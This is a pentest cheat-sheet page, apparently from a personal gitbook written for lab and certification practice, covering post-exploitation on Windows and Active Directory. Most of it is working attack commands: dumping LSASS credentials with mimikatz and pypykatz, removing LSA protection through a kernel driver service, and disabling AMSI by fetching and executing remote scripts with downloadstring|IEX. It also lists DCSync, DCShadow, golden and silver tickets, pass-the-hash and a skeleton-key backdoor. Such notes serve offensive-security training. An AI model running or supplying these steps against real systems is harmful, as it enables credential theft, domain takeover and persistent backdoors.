Exfiltration

Don't mis any data

PoC

Linux

cat proof.txt && whoami && hostname && ip addr

cat local.txt && whoami && hostname && ip addr

Windows

type proof.txt && whoami && hostname && ipconfig

type local.txt && whoami && hostname && ipconfig

Catch the Flag

Windows

dir "\proof*.txt" /s

PS> gci -recurse -inculde FILENAME*

search credentials or password:

gci -path . -recurse -ea SilentlyContinue -Include *.txt,*.ini,*.yml,*.xml,*.ps1,*.cfg |select-string pass

Linux

find / -type f -iname "flag.txt" 2>/dev/null

Dump Active Directory with PS

[PS] Import-Module ActiveDirectory
[PS] Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName

Dump with dump.exe

make sure you able to access Lsass or you have managed the bypass LSA Protection to remove protection.

https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/MiniDump

build it with configuration Release, x64, then run in the compromised user with NT AUTHORITY/SYSTEM priviledge.

the result is in the directory C:\Windows\Tasks\lsass.dmp

then use this command to exctract lsass.dmp via kali linux:

pypykatz lsa minidump lsass.dmp

or via windows machine:

mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Dump with Mimikatz

ref: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz

cheatsheet: https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

copy from: https://kashz.gitbook.io/kashz-jewels/cheatsheet/mimikatz

Bypass LSA Protection

https://blog.cyberadvisors.com/technical-blog/blog/credential-dumping-protections-part-2-bypass-lsa-protection

make sure mimikatz.sys in same folder with mimikatz.exe

run this command:

# detect LSA Protection
# <snip> ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <snip>

.\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

Bypass AV and LSA

make sure the current shell is NT AUTHORITY\SYSTEM

copy mimidrv.sys or mimikats.sys (driver) into the target computer

then create new service

sc create mimidrv binPath= C:\windows\tasks\mimidrv.sys type= kernel start= demand

[SC] CreateService SUCCESS

start new service

sc start mimidrv

then you able to load mimikatz into memory with Invoke-Mimikatz

# disabled AMSI
(new-object system.net.webclient).downloadstring('http://192.168.x.y/amsi.txt') |IEX

# invoke-mimikatz with powershell
(new-object system.net.webclient).downloadstring('http://192.168.x.y/Invoke-Mimikatz.ps1') |IEX

Disable LSA Protection

Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""

if success:

# mimikatz(powershell) # !processprotect /process:lsass.exe /remove
# Process    : lsass.exe
PID 123     -> 00/00 [0-0-0]

Now you able to interact with Lsass.

[Important to start first] Test Mimikatz

privilege::debug
# Privilege '20' OK => Working properly

Password / hashes

# dump logon users pass or ntlm hash
sekurlsa::logonpasswords

# dump hashes
lsadump:sam
lsadump::lsa [/inject | /patch]
# hashcat -m 1000 <hash>

Escalate privilege using NTLM Hash

ref: https://www.youtube.com/watch?v=NeY7OiQTRK8

# get NTLM hash of Administrator from `securlsa::logonpasswords


sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<ntlm hash> /run:cmd

DCsync (Priviledge Escalation AD)

[requirement] user must have permission to domain:

Replication Directory Changes
Replication Directory Changes All

lsadump::dcsync /user:krbtgt
lsadump::dcsync /user:administrator

[recommended to start] Elevate shell integrity

# use when using evil-winrm, we get medium integrity shells
token::elevate

DCshadow

#simple poc
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:description /value:"modified dcshadow"

Attack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)

https://www.elladodelmal.com/2018/03/dcshadow-y-dcsync-enganando-al-domain.html

Use case:

Bypass MFA

# set update attribute
token::elevate
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:telephoneNumber /value:"123-123-223"

# Power up other mimikatz shell to push
lsadump::dcshadow /push

Golden / Silver Ticket

# dump hash and SID
lsadump::lsa /inject /name: [krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT] 

# create golden ticket and pass-the-ticket
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt
# create silver ticket and pass-the-ticket
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103 /ptt

# check
misc::cmd
dir \\IP\c$ [/user:USER PASS]
PsExec.exe \\IP cmd.exe



# Kerberoasing attack 
# ref: https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html
kerberos::list /export
# download ticket in C:\kerberoast and crack with tgsrepcrack.py

Kerberos Skeleton key

Install backdoor to memory, and make all user can use same password "mimikatz".

note: if the machine was reboot, this backdoor can't exists.

misc::skeleton

# done, now accessing admin share
> net use C:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
> dir \\Desktop-1\c$ /user:Machine1 mimikatz

Get DNS Zone

cd C:\Windows
PS> gci -recurse -inculde <DOMAIN>*

Online request server: https://beeceptor.com/

PreviousTransfer File NextPersistence

Last updated 1 year ago

hashtagPoC

hashtagCatch the Flag

hashtagDump Active Directory with PS

hashtagDump with dump.exe

hashtag

hashtagDump with Mimikatz

hashtagBypass LSA Protection

hashtagBypass AV and LSA

hashtag[Important to start first] Test Mimikatz

hashtagPassword / hashes

hashtagEscalate privilege using NTLM Hash

hashtagDCsync (Priviledge Escalation AD)

hashtag[recommended to start] Elevate shell integrity

hashtagDCshadow

hashtagAttack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)

hashtagGolden / Silver Ticket

hashtagKerberos Skeleton key

hashtagGet DNS Zone

PoC